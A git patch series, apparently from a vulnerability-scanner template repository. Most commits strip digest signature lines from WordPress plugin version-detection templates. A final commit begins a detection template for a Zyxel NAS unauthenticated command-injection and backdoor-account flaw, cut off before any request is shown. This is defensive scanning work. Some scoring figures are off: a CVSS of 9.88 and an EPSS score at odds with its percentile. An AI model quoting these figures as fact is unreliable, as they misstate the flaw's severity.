4a0a00473045022100fb861b5428d56f5ddcd23398103632a4e2d0e93a9b08344b332945b13c9ae8a602201a666140eaae25ca407e19dffc8caef599b81d5d285d1a28760cfa8b57524b44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b329ed7191..3e1e79e004 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092d4dfd5246015a4c9604830c00d88c8fee5c8670254c41f23dab2423df30a2602204066011cd3311a98bb0de45e9737424a049ab811d394cc3ac2bba4351ade1fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 4d021745fa..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201f9d73d8d6a08c891e34eda2c54c7ed86c7060dd3cfb6e89644c22a0f70a5bec022016354d4cdafc837aafcdfbfd743f00c3902699c657823452428c3d15985a7ea9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 1ef3246b0f..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f0078f8efcc619f8720d48392966fa3f2ea96033ca064aae611bef5492d98df0221008b1b57234284d24a333d3e260289e546468d87a0408424d9724f205cc0e42565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 352c6a5e95..59554defdf 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec5e95f5cf5ed4102bc8b0476d678e555c94c407bb87635fd084be1dabd5cdd2022100bf1ca1a593d6dfc1bf65bc0e3274a058c961a91e78299d526754184fbf9a56e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 074aa25a65..350fd9436b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bc223bc73ea2fcce34726fb5e0bea9c59728906f6a9c37536f836fdbff48bf3022100df078ddb49070fe44b465c0ed5c59ce63fe7974452ef0299d0c5e2b8d761ac1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 7fea731597..2ae6bafbba 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100efe950bfef18bbcfa4e6cbf99441b5642027941d0cfacc481c6a0a616d7d2d75022100aad3e82d30ca8da62bdb23e5a01f2935e8637f19f8b1b173409edf97b1c4f2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 7fe8a668f6..d0dc8d92bb 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022014123483287b6510307828dd29da46399b7a9a798d91711da0fdb178636058260220690b5cf1747f8fea89fa3b242072429c118b6b36cc1780ba3c29a6a8e8b1b8a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2abdbb1d6a..c49bbc2b6d 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae0142362306739e15d34d1f302323278b65ba1bd354c735a211c8cd6adde044022100f76d43ac1ec626fd1820ca948e8eba5f69f5b459ba6a11c79dd72c15ad42d03e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 72dac64826..27586cbd9d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022028440cef992874c4e9acd909962d91d6c0e20a477af02d1f7a44d72f6d336072022059ca8285e9852c86189503ac697d440df5811fb3eaf789ab3f84ffd8a8b902f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 7ae043ec5a..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054087f013f1f6bb9110aae3c67bd67b7e79c8ce5da9e8d88b9fea49332b7b90e0220593257fd3d92d195b424a9985633c9c9ba171ef878f5db979eecb53b1f04490a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 3a53c16c89..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a86fab14323e2aeb0ab1fd7149428657b2ada4f6f2310618b5df5cb31957a0920221008004b86e7e0d9a62e082151b1384af7682e40f58f76dae5943b611988fbba179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 13b8036d57..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fb3c17ce20946ff4a16c0067e25b96a30ba8aba1a11e1d6c202a60cac1809a51022057ad86bde36a2a6a02cf16137797c1d4dbb4197d3a7402efc416dc9b433d5c33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index bc4c015b47..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044021f4c557d838a5988d9fbcc69efb429478e9cce9f070a202505c6d6c3943dc39e022100d37feb77492bb30cda1beb5a93c566a4394cc4660a228ccee4c253d14f04966c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 85ae54323d..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022070d705b83eb007993fa0a671ee32e0a03eead594c0ee55e3df98c4ac4f18313002201ccc0cde95eea9984e5b2b9e27dd413546de5c45b83b67a73c499e18b9895c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 44c7dfd1e5..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220056a4659f318a06b150d4b84ef5dff4985a306e757c87495e70ee864943f99e9022100b7a9034d914671f35ca4261e8d48f9f4a67c215992bf832e520c7c7b5458ccd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index b7ceecfcfe..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b904ad18a5ef06df81024b3d88af290c3edf360835008401602bafc493ee5e03022100a2e0edf9d64f84a648c54a2120ddf0f0cd9c184a0b21aaa4ee4ec7d3b2d4cca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index be5496d842..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e142d49316c14584390347cb692f71805d992716be572b5feb3767de94df59e02207c883b9616bcb91beae2c3fcb6812a490dd54f0d5228b480546448c2c0b2b671:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6b340a86cc..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204a774ef2331e84def1e6de0bb7336f73ee7fdf79d8860be3f2a6726a3aa0069302206ef2de763b3809f1f82af5de0aab0560e42aca8f763a20aaa2d3b33116bab7cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 0cb10cf616..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022073162e0e6ed34ca86a02eaf2723ce804062ac57898c4ed49fa80524bb0dbbaa60221008a325da0599b51fc7b77bf65f078551ad8ecd17b20df24c7cf3a58db15362d63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 8f84c6a559..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201fccf016cb32c285053889bcb93ef4b1c382f47ab72b9854c5eb829216f891ad02210099a1b5f34c60ed3f66bc0a53dc399ef44cc633c8ad5cb116577bdecc4c8cac70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index c2ff07853f..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f01bcd64dafaa658ace18a1fa4dbb59569fe93dfdba25a7945ff3fa5be5f576e022100dfb63f3c40a69b00abaa75877e0f910e1210e69ebf546aecf928c6229649ba74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 971b1f28e3..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d852e59a63282fea41af66921860f506f12d7ad295f655a1308641ca49a6cdf0221009cc17e4ec2720c66d3e825a84d4096f6a27c319fe83c736bb34d26cbfa2c3647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 8acf48d0a8..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004670eecfea03a21db1ec67d31cac48bcc8e55b8dbcb752d6b08f001ce12799402203d3f76c704ab1d344f93838aa336a7da932087dc1406ecffcc177b7ffaf7f747:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 2c01e5d7a4..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d2aa9267b45c5bc783b90d2a1e35da981a9d3fefe0fbff9b3bf54b8a3596cfb0022100d314e6fafeac9e1751f73d60a4f0d428ac284196a758f62223aa4fb8d26d424b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 70f311ed2f..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009c049e82cf56f513238401ab77d37323abd1c337f1753f2225bdb0e8f9f3578802200e6851db7cf7838c1b89f82cbf4c0940c83c5115e8b1572e36890acc7bef534f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 956d67923b..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ccac19831ff5b80aee3617738d54e5e9290a0c698e9d142482627ffab7035798022100a8090404eda40a716428d533652fcf53655fbcfd5260164852705272d4958a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index fa0f899a06..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c43403e564edf7935893649cf49e06d1975637fffd1f6cc7d7ec53175e51be4022059576fde1b9ebd29431b90b7b8a6e334ce2bcabba38e5d8878909afb785c00eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 77add5d6e3..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ff3ae95c931d6004649fc07cc86eae6708c79ac5e94298c709f8eaa9f53c2f30022100cc963347a717463bb60dfbb7764e4e9a64f2c9c3ad52e7cbf889bd44d1336165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 6a2d48b3cd..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f364516d26128bb6f34e50ad595dd7d20655c2cf34c202e54bc3d85f2fd228d402207f26ef6cf2bde0d038878e3d723c02186dd30a94aa81b38de3532e4b46578a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index e9a6b7cdee..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022008788947143a9b4e06c774e4a70edb28b2832c7bf72a59d62a5c590da8b38692022100ff5f731044a9780326ae9a6b91004ec8dabcfeb1a12ddf19e380623ec411be20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index cddd71bc0c..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220790ca7cd3f97cf59f75a0155add391ea1610cb8c44c89e2cd6118abd2d14193d02201dbe4062b395fd42cfe427c8835bed4607da9c55c411ae5d282589037eadb05e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index c5714b7834..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cbc89c9ba0e84f816c74a579fefe1b5d9a12062c8e94cbf94dd79db914225d01022100e23fb828d19a0b4b9745eb5833d01c58fc9db415bd60691c55b230ef0fd763c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 07e0e157a7..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201a5ba6eae9f1f060c68135689bc63303a2f3c01c0186c772cd43d8ecd9ebc8ac022100fd1c417cffc3a2ba89c18378402e7f263fb5d0e109d5047afbf0bc035548477c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 74b9b23a98..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202030487b439fa918d59e5fd6d3c9d606f15e440c5e2ce409dcc2ca2ab72e34830221009102eed2b913ee6a00a56709a1901fe4ffc0e8be04ac6b0f5e845ff9350ab212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index b801198157..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200252864b5bb92762b1985001888ba26dc6b52c0800cc9e7e6d8e03a0dd6705da0221008b6804f758ea49586c14b32438f954ebb2d3fbed5f349fab00da598c3d600749:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 6f26d28e2f..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022049c114d5dd227f646413c096640ae670e1d2f8f383b92d7dea66ced3492ceed7022100b96a2ed4787feca3a3aa8cb5ed644aa47df64539c4095bcbd6dbd23db337f6c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5efb67d3aa..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a88e5b511a781692162cded1b9bff5b150d8f038c47263a76bc4e18a0605541e0221008d94c49c8a5b8c6695dbcfeca651f8bdbea59beebaf8d71ddf1be60baf8223f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 58e7e65b16..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd677a7ed97e22d77961a405ebb85e20fbedee6fece4a596a18d593b0534c37d02203303c179b8d34c11759792fb50f904ba4c2b76b505d058b566c8fdc9657bea72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index d253055049..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d5b1f83ed520d27ddf007bef7cbe71790ff0abb74b8031902056f4643a274f002207adb22452c7083f598d065fe57db664dd948c936631c42cd0642a262ca246923:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 9edee7f061..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022027816f731712a401a1984f97cbf4e2689fd401884da4b8d2870133c801ecd11c0220740d8b965b7d900694c21617684f74f9f7a41371cfc9c306f8c4c0a81ab169c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 9809306750..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100914daec29e2121125eef430fd46178f74611343cda215d26c56230e9c9f881e60220727ba1a48444de27cfe4cba0b46953a0c670af3c8e9d104e75469ceaa10bba43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index b5c71b18d3..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fde8f06fb067fda931a85d78e3f3525b9b670c3ddd2df0d33dd6bd63ed7f4b99022013310b9f27f451c3d7788b6e1583aa016d38c763d59ffff58e600dbcd76d97b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index d35426f3f5..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d547277b7c277428c02f2352594a85d8e8c484931c5ea06dfe10e1866cacddc022100bbbff5bc6d4190e759ff6a098bc8c6540f3f385b2536de49ed775048a06eb6c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8c2bb20a8b7bcd471588cd6f49a7f75619a17e40 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 1 Jul 2024 10:42:17 +0900 Subject: [PATCH 0730/1841] Create CVE-2024-29972.yaml The command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request. Signed-off-by: GwanYeong Kim --- http/cves/2024/CVE-2024-29972.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2024/CVE-2024-29972.yaml diff --git a/http/cves/2024/CVE-2024-29972.yaml b/http/cves/2024/CVE-2024-29972.yaml new file mode 100644 index 0000000000..2a3009874b --- /dev/null +++ b/http/cves/2024/CVE-2024-29972.yaml @@ -0,0 +1,39 @@ +id: CVE-2024-29972 + +info: + name: Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account + author: gy741 + severity: critical + description: | + The command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request. + reference: + - https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-29972 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.88 + cve-id: CVE-2024-29972 + cwe-id: CWE-78 + epss-score: 0.90000 + epss-percentile: 0.3869 + cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zyxel 